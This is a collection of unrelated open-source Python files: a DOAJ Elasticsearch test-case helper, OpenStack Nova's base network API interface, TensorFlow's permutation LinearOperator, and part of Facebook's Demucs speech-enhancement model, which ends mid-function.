for k, v in properties.items():
originals[k] = inst.config.get(k)
inst.config[k] = v
return originals
def with_es(_func=None, *, indices=None, warm_mappings=None):
def with_es_decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
obj = WithES(func, indices, warm_mappings)
return obj.__call__(*args, **kwargs)
return wrapper
if _func is None:
return with_es_decorator
else:
return with_es_decorator(_func)
class WithES:
def __init__(self, func, indices=None, warm_mappings=None):
self.func = func
self.indices = indices
self.warm_mappings = warm_mappings if warm_mappings is not None else []
def __call__(self, *args, **kwargs):
self.setUp()
resp = self.func(*args, **kwargs)
self.tearDown()
return resp
def setUp(self):
only_mappings = None
if self.indices is not None and self.indices != "all":
only_mappings = self.indices
core.initialise_index(app, core.es_connection, only_mappings=only_mappings)
for im in self.warm_mappings:
if im == "article":
self.warmArticle()
# add more types if they are necessary
def tearDown(self):
dao.DomainObject.destroy_index()
def warmArticle(self):
# push an article to initialise the mappings
from doajtest.fixtures import ArticleFixtureFactory
from portality.models import Article
source = ArticleFixtureFactory.make_article_source()
article = Article(**source)
article.save(blocking=True)
article.delete()
Article.blockdeleted(article.id)
CREATED_INDICES = []
def create_index(index_type):
if index_type in CREATED_INDICES:
return
core.initialise_index(app, core.es_connection, only_mappings=[index_type])
CREATED_INDICES.append(index_type)
def dao_proxy(dao_method, type="class"):
if type == "class":
@classmethod
@functools.wraps(dao_method)
def proxy_method(cls, *args, **kwargs):
create_index(cls.__type__)
return dao_method.__func__(cls, *args, **kwargs)
return proxy_method
else:
@functools.wraps(dao_method)
def proxy_method(self, *args, **kwargs):
create_index(self.__type__)
return dao_method(self, *args, **kwargs)
return proxy_method
class DoajTestCase(TestCase):
app_test = app
originals = {}
@classmethod
def setUpClass(cls) -> None:
cls.originals = patch_config(app, {
"STORE_IMPL": "portality.store.StoreLocal",
"STORE_LOCAL": paths.rel2abs(__file__, "..", "tmp", "store", "main", cls.__name__.lower()),
"STORE_TMP_DIR": paths.rel2abs(__file__, "..", "tmp", "store", "tmp", cls.__name__.lower()),
"ES_RETRY_HARD_LIMIT": 0,
"ES_BLOCK_WAIT_OVERRIDE": 0.1,
"ELASTIC_SEARCH_DB": app.config.get('ELASTIC_SEARCH_TEST_DB'),
'ELASTIC_SEARCH_DB_PREFIX': core.app.config['ELASTIC_SEARCH_TEST_DB_PREFIX'] + cls.__name__.lower() + '-',
"FEATURES": app.config['VALID_FEATURES'],
'ENABLE_EMAIL': False,
"FAKER_SEED": 1
})
main_queue.always_eager = True
long_running.always_eager = True
dao.DomainObject.save = dao_proxy(dao.DomainObject.save, type="instance")
dao.DomainObject.delete = dao_proxy(dao.DomainObject.delete, type="instance")
dao.DomainObject.bulk = dao_proxy(dao.DomainObject.bulk)
dao.DomainObject.refresh = dao_proxy(dao.DomainObject.refresh)
dao.DomainObject.pull = dao_proxy(dao.DomainObject.pull)
dao.DomainObject.pull_by_key = dao_proxy(dao.DomainObject.pull_by_key)
dao.DomainObject.send_query = dao_proxy(dao.DomainObject.send_query)
dao.DomainObject.remove_by_id = dao_proxy(dao.DomainObject.remove_by_id)
dao.DomainObject.delete_by_query = dao_proxy(dao.DomainObject.delete_by_query)
dao.DomainObject.iterate = dao_proxy(dao.DomainObject.iterate)
dao.DomainObject.count = dao_proxy(dao.DomainObject.count)
# if a test on a previous run has totally failed and tearDownClass has not run, then make sure the index is gone first
dao.DomainObject.destroy_index()
# time.sleep(1) # I don't know why we slept here, but not in tearDown, so I have removed it
@classmethod
def tearDownClass(cls) -> None:
patch_config(app, cls.originals)
cls.originals = {}
def setUp(self):
pass
def tearDown(self):
for f in self.list_today_article_history_files() + self.list_today_journal_history_files():
os.remove(f)
shutil.rmtree(paths.rel2abs(__file__, "..", "tmp"), ignore_errors=True)
global CREATED_INDICES
if len(CREATED_INDICES) > 0:
dao.DomainObject.destroy_index()
CREATED_INDICES = []
def list_today_article_history_files(self):
return glob(os.path.join(app.config['ARTICLE_HISTORY_DIR'], datetime.now().strftime('%Y-%m-%d'), '*'))
def list_today_journal_history_files(self):
return glob(os.path.join(app.config['JOURNAL_HISTORY_DIR'], datetime.now().strftime('%Y-%m-%d'), '*'))
def _make_and_push_test_context(self, path="/", acc=None):
ctx = self.app_test.test_request_context(path)
ctx.push()
if acc is not None:
acc.save(blocking=True)
login_user(acc)
return ctx
def diff_dicts(d1, d2, d1_label='d1', d2_label='d2', print_unchanged=False):
"""
Diff two dictionaries - prints changed, added and removed keys and the changed values. DOES NOT DO NESTED DICTS!
:param d1: First dict - we compare this with d2
:param d2: Second dict - we compare against this one
:param d1_label: Will be used instead of "d1" in debugging output to make it more helpful.
:param d2_label: Will be used instead of "d2" in debugging output to make it more helpful.
:param print_unchanged: - should we print set of unchanged keys (can be long and useless). Default: False.
:return: nothing, prints results to STDOUT
"""
differ = dictdiffer.DictDiffer(d1, d2)
print('Added :: keys present in {d1} which are not in {d2}'.format(d1=d1_label, d2=d2_label))
print(differ.added())
print()
print('Removed :: keys present in {d2} which are not in {d1}'.format(d1=d1_label, d2=d2_label))
print(differ.removed())
print()
print('Changed :: keys which are the same in {d1} and {d2} but whose values are different'.format(d1=d1_label, d2=d2_label))
print(differ.changed())
print()
if differ.changed():
print('Changed values :: the values of keys which have changed. Format is as follows:')
print(' Key name:')
print(' value in {d1}'.format(d1=d1_label))
print(' value in {d2}'.format(d2=d2_label))
print()
for key in differ.changed():
print(' ', key + ':')
print(' ', d1[key])
print(' ', d2[key])
print()
print()
if print_unchanged:
print('Unchanged :: keys which are the same in {d1} and {d2} and whose values are also the same'.format(d1=d1_label, d2=d2_label))
print(differ.unchanged())
def load_from_matrix(filename, test_ids):
if test_ids is None:
test_ids = []
with open(paths.rel2abs(__file__, "matrices", filename), 'r') as f:
reader = csv.reader(f)
next(reader) # pop the header row
cases = []
for row in reader:
if row[0] in test_ids or len(test_ids) == 0:
row[0] = "row_id_" + row[0]
cases.append(tuple(row))
return cases
def deep_sort(obj):
"""
Recursively sort list or dict nested lists
"""
if isinstance(obj, dict):
_sorted = {}
for key in sorted(obj):
_sorted[key] = deep_sort(obj[key])
elif isinstance(obj, list):
new_list = []
for val in obj:
new_list.append(deep_sort(val))
_sorted = sorted(new_list)
else:
_sorted = obj
return _sorted
| |
# Copyright 2014 OpenStack Foundation
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import inspect
from oslo_concurrency import lockutils
from oslo_log import log as logging
from oslo_utils import excutils
from nova.db import base
from nova import hooks
from nova.i18n import _, _LE
from nova.network import model as network_model
from nova import objects
LOG = logging.getLogger(__name__)
@hooks.add_hook('instance_network_info')
def update_instance_cache_with_nw_info(impl, context, instance,
nw_info=None, update_cells=True):
try:
if not isinstance(nw_info, network_model.NetworkInfo):
nw_info = None
if nw_info is None:
nw_info = impl._get_instance_nw_info(context, instance)
LOG.debug('Updating cache with info: %s', nw_info)
# NOTE(comstud): The save() method actually handles updating or
# creating the instance. We don't need to retrieve the object
# from the DB first.
ic = objects.InstanceInfoCache.new(context, instance.uuid)
ic.network_info = nw_info
ic.save(update_cells=update_cells)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Failed storing info cache'), instance=instance)
def refresh_cache(f):
"""Decorator to update the instance_info_cache
Requires context and instance as function args
"""
argspec = inspect.getargspec(f)
@functools.wraps(f)
def wrapper(self, context, *args, **kwargs):
res = f(self, context, *args, **kwargs)
try:
# get the instance from arguments (or raise ValueError)
instance = kwargs.get('instance')
if not instance:
instance = args[argspec.args.index('instance') - 2]
except ValueError:
msg = _('instance is a required argument to use @refresh_cache')
raise Exception(msg)
with lockutils.lock('refresh_cache-%s' % instance.uuid):
update_instance_cache_with_nw_info(self, context, instance,
nw_info=res)
# return the original function's return value
return res
return wrapper
SENTINEL = object()
class NetworkAPI(base.Base):
"""Base Network API for doing networking operations.
New operations available on specific clients must be added here as well.
"""
def __init__(self, skip_policy_check=False, **kwargs):
self.skip_policy_check = skip_policy_check
super(NetworkAPI, self).__init__(**kwargs)
def get_all(self, context):
"""Get all the networks for client."""
raise NotImplementedError()
def get(self, context, network_uuid):
"""Get specific network for client."""
raise NotImplementedError()
def create(self, context, **kwargs):
"""Create a network."""
raise NotImplementedError()
def delete(self, context, network_uuid):
"""Delete a specific network."""
raise NotImplementedError()
def disassociate(self, context, network_uuid):
"""Disassociate a network for client."""
raise NotImplementedError()
def get_fixed_ip(self, context, id):
"""Get fixed ip by id."""
raise NotImplementedError()
def get_fixed_ip_by_address(self, context, address):
"""Get fixed ip by address."""
raise NotImplementedError()
def get_floating_ip(self, context, id):
"""Get floating ip by id."""
raise NotImplementedError()
def get_floating_ip_pools(self, context):
"""Get floating ip pools."""
raise NotImplementedError()
def get_floating_ip_by_address(self, context, address):
"""Get floating ip by address."""
raise NotImplementedError()
def get_floating_ips_by_project(self, context):
"""Get floating ips by project."""
raise NotImplementedError()
def get_instance_id_by_floating_address(self, context, address):
"""Get instance id by floating address."""
raise NotImplementedError()
def get_vifs_by_instance(self, context, instance):
"""Get vifs by instance."""
raise NotImplementedError()
def get_vif_by_mac_address(self, context, mac_address):
"""Get vif mac address."""
raise NotImplementedError()
def allocate_floating_ip(self, context, pool=None):
"""Adds (allocate) floating ip to a project from a pool."""
raise NotImplementedError()
def release_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Removes (deallocates) a floating ip with address from a project."""
raise NotImplementedError()
def disassociate_and_release_floating_ip(self, context, instance,
floating_ip):
"""Removes (deallocates) and deletes the floating ip."""
raise NotImplementedError()
def associate_floating_ip(self, context, instance,
floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip."""
raise NotImplementedError()
def disassociate_floating_ip(self, context, instance, address,
affect_auto_assigned=False):
"""Disassociates a floating ip from fixed ip it is associated with."""
raise NotImplementedError()
def allocate_for_instance(self, context, instance, vpn,
requested_networks, macs=None,
security_groups=None,
dhcp_options=None):
"""Allocates all network structures for an instance.
:param context: The request context.
:param instance: nova.objects.instance.Instance object.
:param vpn: A boolean, if True, indicate a vpn to access the instance.
:param requested_networks: A dictionary of requested_networks,
Optional value containing network_id, fixed_ip, and port_id.
:param macs: None or a set of MAC addresses that the instance
should use. macs is supplied by the hypervisor driver (contrast
with requested_networks which is user supplied).
:param security_groups: None or security groups to allocate for
instance.
:param dhcp_options: None or a set of key/value pairs that should
determine the DHCP BOOTP response, eg. for PXE booting an instance
configured with the baremetal hypervisor. It is expected that these
are already formatted for the neutron v2 api.
See nova/virt/driver.py:dhcp_options_for_instance for an example.
:returns: network info as from get_instance_nw_info() below
"""
raise NotImplementedError()
def deallocate_for_instance(self, context, instance,
requested_networks=None):
"""Deallocates all network structures related to instance."""
raise NotImplementedError()
def allocate_port_for_instance(self, context, instance, port_id,
network_id=None, requested_ip=None):
"""Allocate port for instance."""
raise NotImplementedError()
def deallocate_port_for_instance(self, context, instance, port_id):
"""Deallocate port for instance."""
raise NotImplementedError()
def list_ports(self, *args, **kwargs):
"""List ports."""
raise NotImplementedError()
def show_port(self, *args, **kwargs):
"""Show specific port."""
raise NotImplementedError()
def add_fixed_ip_to_instance(self, context, instance, network_id):
"""Adds a fixed ip to instance from specified network."""
raise NotImplementedError()
def remove_fixed_ip_from_instance(self, context, instance, address):
"""Removes a fixed ip from instance from specified network."""
raise NotImplementedError()
def add_network_to_project(self, context, project_id, network_uuid=None):
"""Force adds another network to a project."""
raise NotImplementedError()
def associate(self, context, network_uuid, host=SENTINEL,
project=SENTINEL):
"""Associate or disassociate host or project to network."""
raise NotImplementedError()
def get_instance_nw_info(self, context, instance, **kwargs):
"""Returns all network info related to an instance."""
raise NotImplementedError()
def create_pci_requests_for_sriov_ports(self, context,
pci_requests,
requested_networks):
"""Check requested networks for any SR-IOV port request.
Create a PCI request object for each SR-IOV port, and add it to the
pci_requests object that contains a list of PCI request object.
"""
raise NotImplementedError()
def validate_networks(self, context, requested_networks, num_instances):
"""validate the networks passed at the time of creating
the server.
Return the number of instances that can be successfully allocated
with the requested network configuration.
"""
raise NotImplementedError()
def get_dns_domains(self, context):
"""Returns a list of available dns domains.
These can be used to create DNS entries for floating ips.
"""
raise NotImplementedError()
def add_dns_entry(self, context, address, name, dns_type, domain):
"""Create specified DNS entry for address."""
raise NotImplementedError()
def modify_dns_entry(self, context, name, address, domain):
"""Create specified DNS entry for address."""
raise NotImplementedError()
def delete_dns_entry(self, context, name, domain):
"""Delete the specified dns entry."""
raise NotImplementedError()
def delete_dns_domain(self, context, domain):
"""Delete the specified dns domain."""
raise NotImplementedError()
def get_dns_entries_by_address(self, context, address, domain):
"""Get entries for address and domain."""
raise NotImplementedError()
def get_dns_entries_by_name(self, context, name, domain):
"""Get entries for name and domain."""
raise NotImplementedError()
def create_private_dns_domain(self, context, domain, availability_zone):
"""Create a private DNS domain with nova availability zone."""
raise NotImplementedError()
def create_public_dns_domain(self, context, domain, project=None):
"""Create a public DNS domain with optional nova project."""
raise NotImplementedError()
def setup_networks_on_host(self, context, instance, host=None,
teardown=False):
"""Setup or teardown the network structures on hosts related to
instance.
"""
raise NotImplementedError()
def migrate_instance_start(self, context, instance, migration):
"""Start to migrate the network of an instance."""
raise NotImplementedError()
def migrate_instance_finish(self, context, instance, migration):
"""Finish migrating the network of an instance."""
raise NotImplementedError()
def setup_instance_network_on_host(self, context, instance, host):
"""Setup network for specified instance on host.
:param context: The request context.
:param instance: nova.objects.instance.Instance object.
:param host: The host which network should be setup for instance.
"""
raise NotImplementedError()
def cleanup_instance_network_on_host(self, context, instance, host):
"""Cleanup network for specified instance on host.
:param context: The request context.
:param instance: nova.objects.instance.Instance object.
:param host: The host which network should be cleanup for instance.
"""
raise NotImplementedError()
| |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""`LinearOperator` acting like a permutation matrix."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sort_ops
from tensorflow.python.ops.linalg import linalg_impl as linalg
from tensorflow.python.ops.linalg import linear_operator
from tensorflow.python.ops.linalg import linear_operator_util
from tensorflow.python.util.tf_export import tf_export
__all__ = ["LinearOperatorPermutation",]
@tf_export("linalg.LinearOperatorPermutation")
@linear_operator.make_composite_tensor
class LinearOperatorPermutation(linear_operator.LinearOperator):
"""`LinearOperator` acting like a [batch] of permutation matrices.
This operator acts like a [batch] of permutations with shape
`[B1,...,Bb, N, N]` for some `b >= 0`. The first `b` indices index a
batch member. For every batch index `(i1,...,ib)`, `A[i1,...,ib, : :]` is
an `N x N` matrix. This matrix `A` is not materialized, but for
purposes of broadcasting this shape will be relevant.
`LinearOperatorPermutation` is initialized with a (batch) vector.
A permutation, is defined by an integer vector `v` whose values are unique
and are in the range `[0, ... n]`. Applying the permutation on an input
matrix has the folllowing meaning: the value of `v` at index `i`
says to move the `v[i]`-th row of the input matrix to the `i`-th row.
Because all values are unique, this will result in a permutation of the
rows the input matrix. Note, that the permutation vector `v` has the same
semantics as `tf.transpose`.
```python
# Create a 3 x 3 permutation matrix that swaps the last two columns.
vec = [0, 2, 1]
operator = LinearOperatorPermutation(vec)
operator.to_dense()
==> [[1., 0., 0.]
[0., 0., 1.]
[0., 1., 0.]]
operator.shape
==> [3, 3]
# This will be zero.
operator.log_abs_determinant()
==> scalar Tensor
x = ... Shape [3, 4] Tensor
operator.matmul(x)
==> Shape [3, 4] Tensor
```
#### Shape compatibility
This operator acts on [batch] matrix with compatible shape.
`x` is a batch matrix with compatible shape for `matmul` and `solve` if
```
operator.shape = [B1,...,Bb] + [N, N], with b >= 0
x.shape = [C1,...,Cc] + [N, R],
and [C1,...,Cc] broadcasts with [B1,...,Bb] to [D1,...,Dd]
```
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite, square`.
These have the following meaning:
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
perm,
dtype=dtypes.float32,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
is_square=None,
name="LinearOperatorPermutation"):
r"""Initialize a `LinearOperatorPermutation`.
Args:
perm: Shape `[B1,...,Bb, N]` Integer `Tensor` with `b >= 0`
`N >= 0`. An integer vector that represents the permutation to apply.
Note that this argument is same as `tf.transpose`. However, this
permutation is applied on the rows, while the permutation in
`tf.transpose` is applied on the dimensions of the `Tensor`. `perm`
is required to have unique entries from `{0, 1, ... N-1}`.
dtype: The `dtype` of arguments to this operator. Default: `float32`.
Allowed dtypes: `float16`, `float32`, `float64`, `complex64`,
`complex128`.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose. This is autoset to true
is_positive_definite: Expect that this operator is positive definite,
meaning the quadratic form `x^H A x` has positive real part for all
nonzero `x`. Note that we do not require the operator to be
self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix#Extension_for_non-symmetric_matrices
This is autoset to false.
is_square: Expect that this operator acts like square [batch] matrices.
This is autoset to true.
name: A name for this `LinearOperator`.
Raises:
ValueError: `is_self_adjoint` is not `True`, `is_positive_definite` is
not `False` or `is_square` is not `True`.
"""
parameters = dict(
perm=perm,
dtype=dtype,
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=is_square,
name=name
)
with ops.name_scope(name, values=[perm]):
self._perm = linear_operator_util.convert_nonref_to_tensor(
perm, name="perm")
self._check_perm(self._perm)
# Check and auto-set hints.
if is_non_singular is False: # pylint:disable=g-bool-id-comparison
raise ValueError("A Permutation operator is always non-singular.")
if is_square is False: # pylint:disable=g-bool-id-comparison
raise ValueError("A Permutation operator is always square.")
is_square = True
super(LinearOperatorPermutation, self).__init__(
dtype=dtype,
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=is_square,
parameters=parameters,
name=name)
def _check_perm(self, perm):
"""Static check of perm."""
if (perm.shape.ndims is not None and perm.shape.ndims < 1):
raise ValueError(
"Argument perm must have at least 1 dimension. "
"Found: %s" % perm)
if not perm.dtype.is_integer:
raise TypeError("Argument perm must be integer dtype. Found:"
" %s" % perm)
# Check that the permutation satisfies the uniqueness constraint.
static_perm = tensor_util.constant_value(perm)
if static_perm is not None:
sorted_perm = np.sort(static_perm, axis=-1)
if np.any(sorted_perm != np.arange(0, static_perm.shape[-1])):
raise ValueError(
"Argument perm must be a vector of unique integers from"
" 0 to {}.".format(static_perm.shape[-1] - 1))
def _shape(self):
perm_shape = self._perm.shape
return perm_shape.concatenate(perm_shape[-1:])
def _shape_tensor(self):
perm_shape = array_ops.shape(self._perm)
k = perm_shape[-1]
return array_ops.concat((perm_shape, [k]), 0)
def _assert_non_singular(self):
return control_flow_ops.no_op("assert_non_singular")
def _domain_dimension_tensor(self, perm=None):
perm = perm if perm is not None else self.perm
return array_ops.shape(perm)[-1]
def _matmul(self, x, adjoint=False, adjoint_arg=False):
perm = ops.convert_to_tensor_v2_with_dispatch(self.perm)
if adjoint and not self.is_self_adjoint:
# TODO(srvasude): invert_permutation doesn't work on batches so we use
# argsort.
perm = sort_ops.argsort(perm, axis=-1)
x = linalg.adjoint(x) if adjoint_arg else x
# We need to broadcast x and the permutation since tf.gather doesn't
# broadcast.
broadcast_shape = array_ops.broadcast_dynamic_shape(
array_ops.shape(x)[:-1], array_ops.shape(perm))
k = array_ops.shape(x)[-1]
broadcast_x_shape = array_ops.concat([broadcast_shape, [k]], axis=-1)
x = array_ops.broadcast_to(x, broadcast_x_shape)
perm = array_ops.broadcast_to(perm, broadcast_shape)
m = array_ops.shape(x)[-2]
x = array_ops.reshape(x, [-1, m, k])
perm = array_ops.reshape(perm, [-1, m])
y = array_ops.gather(x, perm, axis=-2, batch_dims=1)
return array_ops.reshape(y, broadcast_x_shape)
# TODO(srvasude): Permutation parity is equivalent to the determinant.
def _log_abs_determinant(self):
# Permutation matrices have determinant +/- 1.
return array_ops.zeros(shape=self.batch_shape_tensor(), dtype=self.dtype)
def _solve(self, rhs, adjoint=False, adjoint_arg=False):
# The inverse of a permutation matrix is the transpose matrix.
# Apply a matmul and flip the adjoint bit.
return self._matmul(rhs, adjoint=(not adjoint), adjoint_arg=adjoint_arg)
def _to_dense(self):
perm = ops.convert_to_tensor_v2_with_dispatch(self.perm)
return math_ops.cast(math_ops.equal(
math_ops.range(0, self._domain_dimension_tensor(perm)),
perm[..., array_ops.newaxis]), self.dtype)
def _diag_part(self):
perm = ops.convert_to_tensor_v2_with_dispatch(self.perm)
return math_ops.cast(math_ops.equal(
math_ops.range(0, self._domain_dimension_tensor(perm)),
perm), self.dtype)
def _cond(self):
# Permutation matrices are rotations which have condition number 1.
return array_ops.ones(self.batch_shape_tensor(), dtype=self.dtype)
@property
def perm(self):
return self._perm
@property
def _composite_tensor_fields(self):
return ("perm", "dtype")
| |
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
# author: adefossez
import math
import time
import torch as th
from torch import nn
from torch.nn import functional as F
from .resample import downsample2, upsample2
from .utils import capture_init
class BLSTM(nn.Module):
def __init__(self, dim, layers=2, bi=True):
super().__init__()
klass = nn.LSTM
self.lstm = klass(
bidirectional=bi, num_layers=layers, hidden_size=dim, input_size=dim
)
self.linear = None
if bi:
self.linear = nn.Linear(2 * dim, dim)
def forward(self, x, hidden=None):
x, hidden = self.lstm(x, hidden)
if self.linear:
x = self.linear(x)
return x, hidden
def rescale_conv(conv, reference):
std = conv.weight.std().detach()
scale = (std / reference)**0.5
conv.weight.data /= scale
if conv.bias is not None:
conv.bias.data /= scale
def rescale_module(module, reference):
for sub in module.modules():
if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d)):
rescale_conv(sub, reference)
class Demucs(nn.Module):
"""
Demucs speech enhancement model.
Args:
- chin (int): number of input channels.
- chout (int): number of output channels.
- hidden (int): number of initial hidden channels.
- depth (int): number of layers.
- kernel_size (int): kernel size for each layer.
- stride (int): stride for each layer.
- causal (bool): if false, uses BiLSTM instead of LSTM.
- resample (int): amount of resampling to apply to the input/output.
Can be one of 1, 2 or 4.
- growth (float): number of channels is multiplied by this for every layer.
- max_hidden (int): maximum number of channels. Can be useful to
control the size/speed of the model.
- normalize (bool): if true, normalize the input.
- glu (bool): if true uses GLU instead of ReLU in 1x1 convolutions.
- rescale (float): controls custom weight initialization.
See https://arxiv.org/abs/1911.13254.
- floor (float): stability flooring when normalizing.
"""
@capture_init
def __init__(self,
chin=1,
chout=1,
hidden=48,
depth=5,
kernel_size=8,
stride=4,
causal=True,
resample=4,
growth=2,
max_hidden=10_000,
normalize=True,
glu=True,
rescale=0.1,
floor=1e-3):
super().__init__()
if resample not in [1, 2, 4]:
raise ValueError("Resample should be 1, 2 or 4.")
self.chin = chin
self.chout = chout
self.hidden = hidden
self.depth = depth
self.kernel_size = kernel_size
self.stride = stride
self.causal = causal
self.floor = floor
self.resample = resample
self.normalize = normalize
self.encoder = nn.ModuleList()
self.decoder = nn.ModuleList()
activation = nn.GLU(1) if glu else nn.ReLU()
ch_scale = 2 if glu else 1
for index in range(depth):
encode = []
encode += [
nn.Conv1d(chin, hidden, kernel_size, stride),
nn.ReLU(),
nn.Conv1d(hidden, hidden * ch_scale, 1), activation,
]
self.encoder.append(nn.Sequential(*encode))
decode = []
decode += [
nn.Conv1d(hidden, ch_scale * hidden, 1), activation,
nn.ConvTranspose1d(hidden, chout, kernel_size, stride),
]
if index > 0:
decode.append(nn.ReLU())
self.decoder.insert(0, nn.Sequential(*decode))
chout = hidden
chin = hidden
hidden = min(int(growth * hidden), max_hidden)
self.lstm = BLSTM(chin, bi=not causal)
if rescale:
rescale_module(self, reference=rescale)
def valid_length(self, length):
"""
Return the nearest valid length to use with the model so that
there is no time steps left over in a convolutions, e.g. for all
layers, size of the input - kernel_size % stride = 0.
If the mixture has a valid length, the estimated sources
will have exactly the same length.
"""
length = math.ceil(length * self.resample)
for _ in range(self.depth):
length = math.ceil((length - self.kernel_size) / self.stride) + 1
length = max(length, 1)
for _ in range(self.depth):
length = (length - 1) * self.stride + self.kernel_size
length = int(math.ceil(length / self.resample))
return int(length)
@property
def total_stride(self):
return self.stride ** self.depth // self.resample
def forward(self, mix):
if mix.dim() == 2:
mix = mix.unsqueeze(1)
if self.normalize:
mono = mix.mean(dim=1, keepdim=True)
std = mono.std(dim=-1, keepdim=True)
mix = mix / (self.floor + std)
else:
std = 1
length = mix.shape[-1]
x = mix
x = F.pad(x, (0, self.valid_length(length) - length))
if self.resample == 2:
x = upsample2(x)
elif self.resample == 4:
x = upsample2(x)
x = upsample2(x)
skips = []
for encode in self.encoder:
x = encode(x)
skips.append(x)
x = x.permute(2, 0, 1)
x, _ = self.lstm(x)
x = x.permute(1, 2, 0)
for decode in self.decoder:
skip = skips.pop(-1)
x = x + skip[..., :x.shape[-1]]
x = decode(x)
if self.resample == 2:
x = downsample2(x)
elif self.resample == 4:
x = downsample2(x)
x = downsample2(x)
x = x[..., :length]
return std * x
def fast_conv(conv, x):
"""
Faster convolution evaluation if either kernel size is 1
or length of sequence is 1.
"""
batch, chin, length = x.shape
chout, chin, kernel = conv.weight.shape
assert batch == 1
if kernel == 1:
x = x.view(chin, length)
out = th.addmm(conv.bias.view(-1, 1),
conv.weight.view(chout, chin), x)
elif length == kernel:
x = x.view(chin * kernel, 1)
out = th.addmm(conv.bias.view(-1, 1),
conv.weight.view(chout, chin * kernel), x)
else:
out = conv(x)
return out.view(batch, chout, -1)
class DemucsStreamer:
"""
Streaming implementation for Demucs. It supports being fed with any amount
of audio at a time. You will get back as much audio as possible at that
point.
Args:
- demucs (Demucs): Demucs model.
- dry (float): amount of dry (e.g. input) signal to keep. 0 is maximum
noise removal, 1 just returns the input signal. Small values > 0
allows to limit distortions.
- num_frames (int): number of frames to process at once. Higher values
will increase overall latency but improve the real time factor.
- resample_lookahead (int): extra lookahead used for the resampling.
- resample_buffer (int): size of the buffer of previous inputs/outputs
kept for resampling.
"""
def __init__(self, demucs,
dry=0,
num_frames=1,
resample_lookahead=64,
resample_buffer=256):
device = next(iter(demucs.parameters())).device
self.demucs = demucs
self.lstm_state = None
self.conv_state = None
self.dry = dry
self.resample_lookahead = resample_lookahead
resample_buffer = min(demucs.total_stride, resample_buffer)
self.resample_buffer = resample_buffer
self.frame_length = demucs.valid_length(1) + \
demucs.total_stride * (num_frames - 1)
self.total_length = self.frame_length + self.resample_lookahead
self.stride = demucs.total_stride * num_frames
self.resample_in = th.zeros(demucs.chin, resample_buffer, device=device)
self.resample_out = th.zeros(
demucs.chin, resample_buffer, device=device
)
self.frames = 0
self.total_time = 0
self.variance = 0
self.pending = th.zeros(demucs.chin, 0, device=device)
bias = demucs.decoder[0][2].bias
weight = demucs.decoder[0][2].weight
chin, chout, kernel = weight.shape
self._bias = bias.view(-1, 1).repeat(1, kernel).view(-1, 1)
self._weight = weight.permute(1, 2, 0).contiguous()
def reset_time_per_frame(self):
self.total_time = 0
self.frames = 0
@property
def time_per_frame(self):
return self.total_time / self.frames
def flush(self):
"""
Flush remaining audio by padding it with zero. Call this
when you have no more input and want to get back the last chunk of audio.
"""
pending_length = self.pending.shape[1]
padding = th.zeros(
self.demucs.chin, self.total_length, device=self.pending.device
)
out = self.feed(padding)
return out[:, :pending_length]
def feed(self, wav):
"""
Apply the model to mix using true real time evaluation.
Normalization is done online as is the resampling.
"""
begin = time.time()
demucs = self.demucs
resample_buffer = self.resample_buffer
stride = self.stride
resample = demucs.resample
if wav.dim() != 2:
raise ValueError("input wav should be two dimensional.")
chin, _ = wav.shape
if chin != demucs.chin:
raise ValueError(f"Expected {demucs.chin} channels, got {chin}")
self.pending = th.cat([self.pending, wav], dim=1)
outs = []
while self.pending.shape[1] >= self.total_length:
self.frames += 1
frame = self.pending[:, :self.total_length]
dry_signal = frame[:, :stride]
if demucs.normalize:
mono = frame.mean(0)
variance = (mono**2).mean()
self.variance = variance / self.frames + \
(1 - 1 / self.frames) * self.variance
frame = frame / (demucs.floor + math.sqrt(self.variance))
frame = th.cat([self.resample_in, frame], dim=-1)
self.resample_in[:] = frame[:, stride - resample_buffer:stride]
if resample == 4:
frame = upsample2(upsample2(frame))
elif resample == 2:
frame = upsample2(frame)
# remove pre sampling buffer
frame = frame[:, resample * resample_buffer:]
# remove extra samples after window
frame = frame[:, :resample * self.frame_length]
out, extra = self._separate_frame(frame)
padded_out = th.cat([self.resample_out, out, extra], 1)
self.resample_out[:] = out[:, -resample_buffer:]
if resample == 4:
out = downsample2(downsample2(padded_out))
elif resample == 2:
